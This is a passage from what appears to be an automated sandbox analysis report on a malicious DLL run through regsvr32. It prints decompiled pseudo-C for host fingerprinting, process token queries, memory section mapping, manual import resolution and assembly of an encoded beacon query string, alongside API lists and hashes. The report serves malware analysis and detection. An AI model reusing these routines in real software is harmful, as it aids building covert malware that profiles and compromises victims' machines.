                                    							_t63 = _t68;
                                    							_t69[3] = _t69[3] ^ E001A1D41(_v8 + _v8, _t63);
                                    						}
                                    						HeapFree( *0x1aa290, 0, _t68);
                                    					}
                                    				}
                                    				asm("cpuid");
                                    				_t67 =  &_v28;
                                    				 *_t67 = 1;
                                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                    				 *(_t67 + 8) = _t63;
                                    				 *(_t67 + 0xc) = _t64;
                                    				_t39 = _v16 ^ _v20 ^ _v28;
                                    				_t69[1] = _t69[1] ^ _t39;
                                    				return _t39;
                                    			}

                                    APIs
                                    • GetUserNameW.ADVAPI32(00000000,001A5FA9), ref: 001A2E6A
                                    • RtlAllocateHeap.NTDLL(00000000,001A5FA9), ref: 001A2E81
                                    • GetUserNameW.ADVAPI32(00000000,001A5FA9), ref: 001A2E8E
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A2EAF
                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 001A2ED6
                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001A2EEA
                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 001A2EF7
                                    • HeapFree.KERNEL32(00000000,00000000), ref: 001A2F15
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: HeapName$AllocateComputerFreeUser
                                    • String ID:
                                    • API String ID: 3239747167-0
                                    • Opcode ID: 5b93a843b436b25345005987747340791bd1fc4df951f652b0fcca7111a52151
                                    • Instruction ID: bc6e0b669991312e48ec06d1ed373bce52e10c6f20f454c774712d9cbae132d0
                                    • Opcode Fuzzy Hash: 5b93a843b436b25345005987747340791bd1fc4df951f652b0fcca7111a52151
                                    • Instruction Fuzzy Hash: 4F310676A00209EFDB11DFA9DD81AAEB7F9FF4A350F604429E505D7620E730AE809B51
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Control-flow Graph

                                    C-Code - Quality: 38%
                                    			E001A22EC(char _a4, void* _a8) {
                                    				void* _v8;
                                    				void* _v12;
                                    				char _v16;
                                    				void* _v20;
                                    				char _v24;
                                    				char _v28;
                                    				char _v32;
                                    				char _v36;
                                    				char _v40;
                                    				void* _v44;
                                    				void** _t33;
                                    				void* _t40;
                                    				void* _t43;
                                    				void** _t44;
                                    				intOrPtr* _t47;
                                    				char _t48;
                                    
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_v20 = _a4;
                                    				_t48 = 0;
                                    				_v16 = 0;
                                    				_a4 = 0;
                                    				_v44 = 0x18;
                                    				_v40 = 0;
                                    				_v32 = 0;
                                    				_v36 = 0;
                                    				_v28 = 0;
                                    				_v24 = 0;
                                    				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
                                    					_t33 =  &_v8;
                                    					__imp__(_v12, 8, _t33);
                                    					if(_t33 >= 0) {
                                    						_t47 = __imp__;
                                    						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
                                    						_t44 = E001A77D7(_a4);
                                    						if(_t44 != 0) {
                                    							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
                                    							if(_t40 >= 0) {
                                    								memcpy(_a8,  *_t44, 0x1c);
                                    								_t48 = 1;
                                    							}
                                    							E001A77EC(_t44);
                                    						}
                                    						NtClose(_v8); // executed
                                    					}
                                    					NtClose(_v12);
                                    				}
                                    				return _t48;
                                    			}

                                    APIs
                                    • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 001A2333
                                    • NtOpenProcessToken.NTDLL(00000000,00000008,00000000), ref: 001A2346
                                    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 001A2362
                                      • Part of subcall function 001A77D7: RtlAllocateHeap.NTDLL(00000000,00000000,001A1275), ref: 001A77E3
                                    • NtQueryInformationToken.NTDLL(00000000,00000001,00000000,00000000,00000000), ref: 001A237F
                                    • memcpy.NTDLL(00000000,00000000,0000001C), ref: 001A238C
                                    • NtClose.NTDLL(00000000), ref: 001A239E
                                    • NtClose.NTDLL(00000000), ref: 001A23A8
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                    • String ID:
                                    • API String ID: 2575439697-0
                                    • Opcode ID: 1cbc3f3152d74a83c0c6d93e6105b0e89b1e88da4503842f227c768af75aa889
                                    • Instruction ID: 1ee0783d4355a249149c9c088fc00a4d46e47975d0178081e2fe40b9879cef30
                                    • Opcode Fuzzy Hash: 1cbc3f3152d74a83c0c6d93e6105b0e89b1e88da4503842f227c768af75aa889
                                    • Instruction Fuzzy Hash: 5821E9B6A00219BBDF01AF95CC459DEBFBDFF0A750F104066F504E6160D7719A859BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 72%
                                    			E6E2A2013(intOrPtr* __eax, void** _a4) {
                                    				int _v12;
                                    				void* _v16;
                                    				void* _v20;
                                    				void* _v24;
                                    				int _v28;
                                    				int _v32;
                                    				intOrPtr _v36;
                                    				int _v40;
                                    				int _v44;
                                    				void* _v48;
                                    				void* __esi;
                                    				long _t34;
                                    				void* _t39;
                                    				void* _t47;
                                    				intOrPtr* _t48;
                                    
                                    				_t48 = __eax;
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				asm("stosd");
                                    				_v24 =  *((intOrPtr*)(__eax + 4));
                                    				_v16 = 0;
                                    				_v12 = 0;
                                    				_v48 = 0x18;
                                    				_v44 = 0;
                                    				_v36 = 0x40;
                                    				_v40 = 0;
                                    				_v32 = 0;
                                    				_v28 = 0;
                                    				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
                                    				if(_t34 < 0) {
                                    					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
                                    				} else {
                                    					 *_t48 = _v16;
                                    					_t39 = E6E2A121F(_t48,  &_v12); // executed
                                    					_t47 = _t39;
                                    					if(_t47 != 0) {
                                    						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
                                    					} else {
                                    						memset(_v12, 0, _v24);
                                    						 *_a4 = _v12;
                                    					}
                                    				}
                                    				return _t47;
                                    			}

                                    APIs
                                    • NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74EC1222,00000000,00000000), ref: 6E2A2070
                                      • Part of subcall function 6E2A121F: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E2A124C
                                    • memset.NTDLL ref: 6E2A2092
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Section$CreateViewmemset
                                    • String ID: @
                                    • API String ID: 2533685722-2766056989
                                    • Opcode ID: 30335dec29f88378c7f926de13ada1ea94910b89b6dc03b9477e7fe4fe8ef42a
                                    • Instruction ID: 3ecbb327a7c671c733ac57ed1beb5a147581331d7576973ef6a1b0d44339370e
                                    • Opcode Fuzzy Hash: 30335dec29f88378c7f926de13ada1ea94910b89b6dc03b9477e7fe4fe8ef42a
                                    • Instruction Fuzzy Hash: DA211DB6D0020DAFDB11DFE9C8849DEFBBAEF58354F508429E615F7210D7719A488B60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 58%
                                    			E6E2A105E(void* __ecx) {
                                    				char _v8;
                                    				signed short _t7;
                                    
                                    				_v8 = _v8 & 0x00000000;
                                    				_t7 = GetLocaleInfoA(0x400, 0x5a,  &_v8, 4); // executed
                                    				if(_t7 == 0) {
                                    					__imp__GetSystemDefaultUILanguage();
                                    					VerLanguageNameA(_t7 & 0xffff,  &_v8, 4);
                                    				}
                                    				return _v8;
                                    			}

                                    APIs
                                    • GetLocaleInfoA.KERNEL32(00000400,0000005A,00000000,00000004,?,?,6E2A178D,?,6E2A1A94,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A1073
                                    • GetSystemDefaultUILanguage.KERNEL32(?,?,6E2A178D,?,6E2A1A94,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A107D
                                    • VerLanguageNameA.KERNEL32(?,00000000,00000004,?,?,6E2A178D,?,6E2A1A94,?,00000000,00000001,?,?,?,6E2A1A94), ref: 6E2A1090
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: Language$DefaultInfoLocaleNameSystem
                                    • String ID:
                                    • API String ID: 3724080410-0
                                    • Opcode ID: db74b109c87c19a99d2f440aabfcfd7b1127e2cbdbb99bebcd4f6915434044ce
                                    • Instruction ID: d3d4ad6bb298bf18cf0c274f94187eda5004a4bb19b3f9fce126bbbe3bca8ab5
                                    • Opcode Fuzzy Hash: db74b109c87c19a99d2f440aabfcfd7b1127e2cbdbb99bebcd4f6915434044ce
                                    • Instruction Fuzzy Hash: 31E04FA4644249B7EB00D7E58D0AFBDB2BDAB01B0AF500084FB11E60C0D7B49E04E735
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 100%
                                    			E6E2A1552(void* __edi, intOrPtr _a4) {
                                    				signed int _v8;
                                    				intOrPtr* _v12;
                                    				_Unknown_base(*)()** _v16;
                                    				signed int _v20;
                                    				signed short _v24;
                                    				struct HINSTANCE__* _v28;
                                    				intOrPtr _t43;
                                    				intOrPtr* _t45;
                                    				intOrPtr _t46;
                                    				struct HINSTANCE__* _t47;
                                    				intOrPtr* _t49;
                                    				intOrPtr _t50;
                                    				signed short _t51;
                                    				_Unknown_base(*)()* _t53;
                                    				CHAR* _t54;
                                    				_Unknown_base(*)()* _t55;
                                    				void* _t58;
                                    				signed int _t59;
                                    				_Unknown_base(*)()* _t60;
                                    				intOrPtr _t61;
                                    				intOrPtr _t65;
                                    				signed int _t68;
                                    				void* _t69;
                                    				CHAR* _t71;
                                    				signed short* _t73;
                                    
                                    				_t69 = __edi;
                                    				_v20 = _v20 & 0x00000000;
                                    				_t59 =  *0x6e2a41cc;
                                    				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x4d92f9a0));
                                    				if(_t43 != 0) {
                                    					_t45 = _t43 + __edi;
                                    					_v12 = _t45;
                                    					_t46 =  *((intOrPtr*)(_t45 + 0xc));
                                    					if(_t46 != 0) {
                                    						while(1) {
                                    							_t71 = _t46 + _t69;
                                    							_t47 = LoadLibraryA(_t71); // executed
                                    							_v28 = _t47;
                                    							if(_t47 == 0) {
                                    								break;
                                    							}
                                    							_v24 = _v24 & 0x00000000;
                                    							 *_t71 = _t59 - 0x69b25f44;
                                    							_t49 = _v12;
                                    							_t61 =  *((intOrPtr*)(_t49 + 0x10));
                                    							_t50 =  *_t49;
                                    							if(_t50 != 0) {
                                    								L6:
                                    								_t73 = _t50 + _t69;
                                    								_v16 = _t61 + _t69;
                                    								while(1) {
                                    									_t51 =  *_t73;
                                    									if(_t51 == 0) {
                                    										break;
                                    									}
                                    									if(__eflags < 0) {
                                    										__eflags = _t51 - _t69;
                                    										if(_t51 < _t69) {
                                    											L12:
                                    											_t21 =  &_v8;
                                    											 *_t21 = _v8 & 0x00000000;
                                    											__eflags =  *_t21;
                                    											_v24 =  *_t73 & 0x0000ffff;
                                    										} else {
                                    											_t65 = _a4;
                                    											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
                                    											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
                                    												goto L12;
                                    											} else {
                                    												goto L11;
                                    											}
                                    										}
                                    									} else {
                                    										_t51 = _t51 + _t69;
                                    										L11:
                                    										_v8 = _t51;
                                    									}
                                    									_t53 = _v8;
                                    									__eflags = _t53;
                                    									if(_t53 == 0) {
                                    										_t54 = _v24 & 0x0000ffff;
                                    									} else {
                                    										_t54 = _t53 + 2;
                                    									}
                                    									_t55 = GetProcAddress(_v28, _t54);
                                    									__eflags = _t55;
                                    									if(__eflags == 0) {
                                    										_v20 = _t59 - 0x69b25ec5;
                                    									} else {
                                    										_t68 = _v8;
                                    										__eflags = _t68;
                                    										if(_t68 != 0) {
                                    											 *_t68 = _t59 - 0x69b25f44;
                                    										}
                                    										 *_v16 = _t55;
                                    										_t58 = 0x593682f4 + _t59 * 4;
                                    										_t73 = _t73 + _t58;
                                    										_t32 =  &_v16;
                                    										 *_t32 = _v16 + _t58;
                                    										__eflags =  *_t32;
                                    										continue;
                                    									}
                                    									goto L23;
                                    								}
                                    							} else {
                                    								_t50 = _t61;
                                    								if(_t61 != 0) {
                                    									goto L6;
                                    								}
                                    							}
                                    							L23:
                                    							_v12 = _v12 + 0x14;
                                    							_t46 =  *((intOrPtr*)(_v12 + 0xc));
                                    							if(_t46 != 0) {
                                    								continue;
                                    							} else {
                                    							}
                                    							L26:
                                    							goto L27;
                                    						}
                                    						_t60 = _t59 + 0x964da13a;
                                    						__eflags = _t60;
                                    						_v20 = _t60;
                                    						goto L26;
                                    					}
                                    				}
                                    				L27:
                                    				return _v20;
                                    			}

                                    APIs
                                    • LoadLibraryA.KERNEL32 ref: 6E2A158A
                                    • GetProcAddress.KERNEL32(?,00000000), ref: 6E2A15FC
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID:
                                    • API String ID: 2574300362-0
                                    • Opcode ID: 074c329e8e715e9cc5145349dc06cee5b2db07e7c8e763f0ce4f9961886e1ec3
                                    • Instruction ID: 0fe7807370ec9f0791ad851b8946d4aafa8ee3ea4585429064ef307608e1e915
                                    • Opcode Fuzzy Hash: 074c329e8e715e9cc5145349dc06cee5b2db07e7c8e763f0ce4f9961886e1ec3
                                    • Instruction Fuzzy Hash: C33119B1A0020A9FDB54CF9DC894AADB7FAFF05721F144069DA15E7245E770DA88CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 64%
                                    			E001A4D62(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                    				void* _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				intOrPtr _t22;
                                    				void* _t24;
                                    				intOrPtr* _t26;
                                    				intOrPtr* _t28;
                                    				void* _t32;
                                    				intOrPtr* _t33;
                                    				intOrPtr _t36;
                                    				intOrPtr* _t39;
                                    				void* _t46;
                                    
                                    				_t22 =  *0x1aa2d4; // 0x314d7d0
                                    				_t2 = _t22 + 0x1ab0dc; // 0x32f88ac
                                    				_t3 = _t22 + 0x1ab0cc; // 0x4590f811
                                    				_t39 = 0;
                                    				_v12 = 0;
                                    				_t24 =  *0x1aa140(_t3, 0, 1, _t2,  &_v16); // executed
                                    				_t46 = _t24;
                                    				if(_t46 >= 0) {
                                    					if(_a8 != 0) {
                                    						_t36 =  *0x1aa2d4; // 0x314d7d0
                                    						_t8 = _t36 + 0x1ab3e4; // 0x5f005f
                                    						E001A757B(_t8, _a8,  &_v12);
                                    						_t39 = _v12;
                                    					}
                                    					_t26 = _v16;
                                    					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
                                    					if(_t46 >= 0) {
                                    						_t32 =  *0x1aa150(_v8, 0xa, 0, 0, 3, 3, 0, 0); // executed
                                    						_t46 = _t32;
                                    						_t33 = _v8;
                                    						if(_t46 < 0) {
                                    							 *((intOrPtr*)( *_t33 + 8))(_t33);
                                    						} else {
                                    							 *_a12 = _t33;
                                    						}
                                    					}
                                    					if(_t39 != 0) {
                                    						 *((intOrPtr*)( *_t39 + 8))(_t39);
                                    					}
                                    					_t28 = _v16;
                                    					 *((intOrPtr*)( *_t28 + 8))(_t28);
                                    				}
                                    				return _t46;
                                    			}

                                    APIs
                                    • CoCreateInstance.OLE32(4590F811,00000000,00000001,032F88AC,74EEBB27), ref: 001A4D8C
                                    • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001A4DE1
                                      • Part of subcall function 001A757B: CoCreateInstance.OLE32(674B6698,00000000,00000001,032F88CC,?), ref: 001A75B4
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.673473096.00000000001A1000.00000020.00020000.sdmp, Offset: 001A0000, based on PE: true
                                    • Associated: 00000006.00000002.673469231.00000000001A0000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673479374.00000000001A9000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.673482507.00000000001AA000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.673486339.00000000001AC000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_1a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: CreateInstance$BlanketProxy
                                    • String ID:
                                    • API String ID: 3291578418-0
                                    • Opcode ID: abdc90ec0dc47799b7df778cc1e8ef816a679a2d96d9d90170674199dfc41f17
                                    • Instruction ID: cbba11266d2fd85c6d4ad0be512c6dceeebdaef5d784ecbd0be315b7fa0954d2
                                    • Opcode Fuzzy Hash: abdc90ec0dc47799b7df778cc1e8ef816a679a2d96d9d90170674199dfc41f17
                                    • Instruction Fuzzy Hash: 17217C79600218BFCB10DBA8CCC8D9EBBBDEF8A754F114495F506DB251C7719A45CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 68%
                                    			E6E2A121F(void** __esi, PVOID* _a4) {
                                    				long _v8;
                                    				void* _v12;
                                    				void* _v16;
                                    				long _t13;
                                    
                                    				_v16 = 0;
                                    				asm("stosd");
                                    				_v8 = 0;
                                    				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
                                    				if(_t13 < 0) {
                                    					_push(_t13);
                                    					return __esi[6]();
                                    				}
                                    				return 0;
                                    			}

                                    APIs
                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 6E2A124C
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.674571641.000000006E2A1000.00000020.00020000.sdmp, Offset: 6E2A0000, based on PE: true
                                    • Associated: 00000006.00000002.674566066.000000006E2A0000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674578770.000000006E2A3000.00000002.00020000.sdmp
                                    • Associated: 00000006.00000002.674583995.000000006E2A5000.00000004.00020000.sdmp
                                    • Associated: 00000006.00000002.674588788.000000006E2A6000.00000002.00020000.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_6e2a0000_regsvr32.jbxd
                                    Similarity
                                    • API ID: SectionView
                                    • String ID:
                                    • API String ID: 1323581903-0
                                    • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                    • Instruction ID: 8569589e5b9309767c5e656b24a28060d632bc0665ff70dcbf8cf0feea508bea
                                    • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
                                    • Instruction Fuzzy Hash: CBF012B590020CBFEB119FA9CC85C9FBBBEEB44364B104939F252E1090D6349E488A60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 70%
                                    			E001A7106(long __eax, void* __edx, intOrPtr _a8, intOrPtr _a12, void* _a20, intOrPtr _a28) {
                                    				intOrPtr _v4;
                                    				intOrPtr _v8;
                                    				intOrPtr _v12;
                                    				intOrPtr _v16;
                                    				void* _v24;
                                    				intOrPtr _v40;
                                    				void* __ecx;
                                    				void* __edi;
                                    				intOrPtr _t31;
                                    				intOrPtr _t32;
                                    				intOrPtr _t33;
                                    				intOrPtr _t34;
                                    				intOrPtr _t35;
                                    				void* _t38;
                                    				intOrPtr _t39;
                                    				int _t42;
                                    				void* _t43;
                                    				intOrPtr _t44;
                                    				intOrPtr _t48;
                                    				intOrPtr _t52;
                                    				intOrPtr _t55;
                                    				intOrPtr _t56;
                                    				intOrPtr _t62;
                                    				intOrPtr _t66;
                                    				intOrPtr* _t68;
                                    				void* _t69;
                                    				intOrPtr _t78;
                                    				intOrPtr _t81;
                                    				intOrPtr _t84;
                                    				int _t87;
                                    				intOrPtr _t88;
                                    				int _t91;
                                    				intOrPtr _t92;
                                    				int _t95;
                                    				void* _t98;
                                    				void* _t99;
                                    				void* _t103;
                                    				intOrPtr _t105;
                                    				long _t107;
                                    				intOrPtr _t108;
                                    				intOrPtr* _t109;
                                    				long _t110;
                                    				int _t111;
                                    				void* _t112;
                                    				void* _t113;
                                    				void* _t114;
                                    				void* _t115;
                                    				void* _t117;
                                    				void* _t118;
                                    				void* _t120;
                                    				void* _t121;
                                    
                                    				_t103 = __edx;
                                    				_t110 = __eax;
                                    				_v8 = 8;
                                    				_t117 = RtlAllocateHeap( *0x1aa290, 0, 0x800);
                                    				if(_t117 != 0) {
                                    					if(_t110 == 0) {
                                    						_t110 = GetTickCount();
                                    					}
                                    					_t31 =  *0x1aa018; // 0xd0e4fb36
                                    					asm("bswap eax");
                                    					_t32 =  *0x1aa014; // 0xf7f8bd56
                                    					asm("bswap eax");
                                    					_t33 =  *0x1aa010; // 0xe67532f
                                    					asm("bswap eax");
                                    					_t34 =  *0x1aa00c; // 0x73a6f34e
                                    					asm("bswap eax");
                                    					_t35 =  *0x1aa2d4; // 0x314d7d0
                                    					_t2 = _t35 + 0x1ab622; // 0x74666f73
                                    					_t111 = wsprintfA(_t117, _t2, 2, 0x3d163, _t34, _t33, _t32, _t31,  *0x1aa02c,  *0x1aa004, _t110);
                                    					_t38 = E001A4155();
                                    					_t39 =  *0x1aa2d4; // 0x314d7d0
                                    					_t3 = _t39 + 0x1ab662; // 0x74707526
                                    					_t42 = wsprintfA(_t111 + _t117, _t3, _t38);
                                    					_t120 = _t118 + 0x38;
                                    					_t112 = _t111 + _t42;
                                    					if(_a12 != 0) {
                                    						_t92 =  *0x1aa2d4; // 0x314d7d0
                                    						_t7 = _t92 + 0x1ab66d; // 0x732526
                                    						_t95 = wsprintfA(_t112 + _t117, _t7, _a12);
                                    						_t120 = _t120 + 0xc;
                                    						_t112 = _t112 + _t95;
                                    					}
                                    					_t43 = E001A35BC(_t99);
                                    					_t44 =  *0x1aa2d4; // 0x314d7d0
                                    					_t9 = _t44 + 0x1ab38a; // 0x6d697426
                                    					_t113 = _t112 + wsprintfA(_t112 + _t117, _t9, _t43, _t103);
                                    					_t48 =  *0x1aa2d4; // 0x314d7d0
                                    					_t11 = _t48 + 0x1ab33b; // 0x74636126
                                    					_t114 = _t113 + wsprintfA(_t113 + _t117, _t11, 0);
                                    					_t52 =  *0x1aa32c; // 0x32f97d8
                                    					_t121 = _t120 + 0x1c;
                                    					if(_t52 != 0) {
                                    						_t88 =  *0x1aa2d4; // 0x314d7d0
                                    						_t13 = _t88 + 0x1ab685; // 0x73797326
                                    						_t91 = wsprintfA(_t114 + _t117, _t13, _t52);
                                    						_t121 = _t121 + 0xc;
                                    						_t114 = _t114 + _t91;
                                    					}
                                    					_t105 =  *0x1aa37c; // 0x32f9858
                                    					_a28 = E001A49BA(0x1aa00a, _t105 + 4);
                                    					_t55 =  *0x1aa31c; // 0x32f9808
                                    					_t107 = 0;
                                    					if(_t55 != 0) {
                                    						_t84 =  *0x1aa2d4; // 0x314d7d0
                                    						_t16 = _t84 + 0x1ab8e9; // 0x3d736f26
                                    						_t87 = wsprintfA(_t114 + _t117, _t16, _t55);
                                    						_t121 = _t121 + 0xc;
                                    						_t114 = _t114 + _t87;
                                    					}
                                    					_t56 =  *0x1aa318; // 0x0
                                    					if(_t56 != _t107) {
                                    						_t81 =  *0x1aa2d4; // 0x314d7d0
                                    						_t18 = _t81 + 0x1ab8e2; // 0x3d706926
                                    						wsprintfA(_t114 + _t117, _t18, _t56);
                                    					}
                                    					if(_a28 != _t107) {
                                    						_t98 = RtlAllocateHeap( *0x1aa290, _t107, 0x800);
                                    						if(_t98 != _t107) {
                                    							E001A3D0C(GetTickCount());
                                    							_t62 =  *0x1aa37c; // 0x32f9858
                                    							__imp__(_t62 + 0x40);
                                    							asm("lock xadd [eax], ecx");
                                    							_t66 =  *0x1aa37c; // 0x32f9858
                                    							__imp__(_t66 + 0x40);
                                    							_t68 =  *0x1aa37c; // 0x32f9858
                                    							_t69 = E001A637D(1, _t103, _t117,  *_t68); // executed
                                    							_t115 = _t69;
                                    							asm("lock xadd [eax], ecx");
                                    							if(_t115 != _t107) {
                                    								StrTrimA(_t115, 0x1a92ac);
                                    								_push(_t115);
                                    								_t108 = E001A7067();
                                    								_v4 = _t108;
                                    								if(_t108 != 0) {
                                    									 *_t115 = 0;
                                    									__imp__(_t98, _a8);
                                    									_t109 = __imp__;
                                    									 *_t109(_t98, _t108);
                                    									 *_t109(_t98, _t115);
                                    									_t78 = E001A3735(0xffffffffffffffff, _t98, _v12, _v8); // executed
                                    									_v40 = _t78;
                                    									if(_t78 != 0 && _t78 != 0x10d2) {
                                    										E001A454A();
                                    									}
                                    									HeapFree( *0x1aa290, 0, _v24);
                                    								}
                                    								HeapFree( *0x1aa290, 0, _t115);
                                    								_t107 = 0;
                                    							}
                                    							HeapFree( *0x1aa290, _t107, _t98);
                                    						}
                                    						HeapFree( *0x1aa290, _t107, _a20);
                                    					}
                                    					HeapFree( *0x1aa290, _t107, _t117);
                                    				}
                                    				return _v16;
                                    			}

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,00000800,?), ref: 001A7124
                                    • GetTickCount.KERNEL32 ref: 001A7138
                                    • wsprintfA.USER32 ref: 001A7187
                                    • wsprintfA.USER32 ref: 001A71A4
                                    • wsprintfA.USER32 ref: 001A71C5
                                    • wsprintfA.USER32 ref: 001A71E3
                                    • wsprintfA.USER32 ref: 001A71F8
                                    • wsprintfA.USER32 ref: 001A7219
                                    • wsprintfA.USER32 ref: 001A7253
                                    • wsprintfA.USER32 ref: 001A7273
                                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 001A728E
                                    • GetTickCount.KERNEL32 ref: 001A729E
                                    • RtlEnterCriticalSection.NTDLL(032F9818), ref: 001A72B2
                                    • RtlLeaveCriticalSection.NTDLL(032F9818), ref: 001A72D0
                                      • Part of subcall function 001A637D: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63A8
                                      • Part of subcall function 001A637D: lstrlen.KERNEL32(00000000,?,00000000,001A72E3,00000000,032F9858), ref: 001A63B0
                                      • Part of subcall function 001A637D: strcpy.NTDLL ref: 001A63C7
                                      • Part of subcall function 001A637D: lstrcat.KERNEL32(00000000,00000000), ref: 001A63D2
                                      • Part of subcall function 001A637D: StrTrimA.SHLWAPI(00000000,=), ref: 001A63EF
                                    • StrTrimA.SHLWAPI(00000000,001A92AC), ref: 001A72FE
                                      • Part of subcall function 001A7067: lstrlen.KERNEL32(032F8AA2,00000000,00000000,00000000,001A730A,00000000), ref: 001A7077
                                      • Part of subcall function 001A7067: lstrlen.KERNEL32(?), ref: 001A707F
